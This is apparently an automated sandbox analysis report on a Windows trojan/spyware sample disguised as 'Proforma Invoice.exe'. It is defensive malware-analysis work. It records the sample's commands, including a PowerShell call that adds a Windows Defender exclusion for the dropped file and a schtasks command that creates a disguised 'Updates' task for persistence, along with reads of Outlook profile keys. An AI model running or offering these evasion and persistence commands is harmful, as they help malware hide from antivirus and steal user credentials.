                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067D11088_2_067D1108
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_0696E7188_2_0696E718
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06965CE88_2_06965CE8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06962A548_2_06962A54
                    Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.418665405.0000000004169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameThookinieng.dllJ vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.416363031.0000000002961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.416363031.0000000002961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenImpersonation.dll" vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.425054578.0000000007440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenImpersonation.dll" vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000003.395674663.0000000008768000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000000.369717521.000000000059E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000000.00000002.426347057.000000000ADA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameThookinieng.dllJ vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000008.00000002.637983278.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exe, 00000008.00000002.638082083.00000000010F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
                    Source: Proforma Invoice.exeBinary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
                    Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ebJpPhiwjcAviB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Proforma Invoice.exeVirustotal: Detection: 31%
                    Source: Proforma Invoice.exeMetadefender: Detection: 37%
                    Source: Proforma Invoice.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                    Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice.exe "C:\Users\user\Desktop\Proforma Invoice.exe"
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8D30.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/10@2/2
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: Proforma Invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_01
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeMutant created: \Sessions\1\BaseNamedObjects\yvSZwEJqePRQzBhnb
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3516:120:WilError_01
                    Source: Proforma Invoice.exe, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ebJpPhiwjcAviB.exe.0.dr, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.0.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 8.2.Proforma Invoice.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 8.2.Proforma Invoice.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 8.0.Proforma Invoice.exe.bd0000.5.unpack, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 8.0.Proforma Invoice.exe.bd0000.11.unpack, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 8.0.Proforma Invoice.exe.bd0000.9.unpack, VW/gs.csCryptographic APIs: 'TransformFinalBlock'
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Proforma Invoice.exe, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: ebJpPhiwjcAviB.exe.0.dr, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Proforma Invoice.exe.bd0000.5.unpack, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Proforma Invoice.exe.bd0000.11.unpack, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Proforma Invoice.exe.bd0000.9.unpack, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.2.Proforma Invoice.exe.bd0000.1.unpack, VW/gs.cs.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_004C9BFE push 380A0001h; ret 0_2_004C9C61
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00F598E8 push esp; iretd 0_2_00F598E9
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00F51C58 push ebx; iretd 0_2_00F51C7A
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F6DEC push eax; ret 0_2_053F6DED
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_00BD9BFE push 380A0001h; ret 8_2_00BD9C61
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067818F7 push es; ret 8_2_06781910
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067818AB push es; ret 8_2_067818C4
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06782177 push edi; retn 0000h8_2_06782179
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06964791 pushfd ; iretd 8_2_0696479D
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06968AA0 push esp; retf 8_2_06968AAD
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.524828218449115
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.524828218449115
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
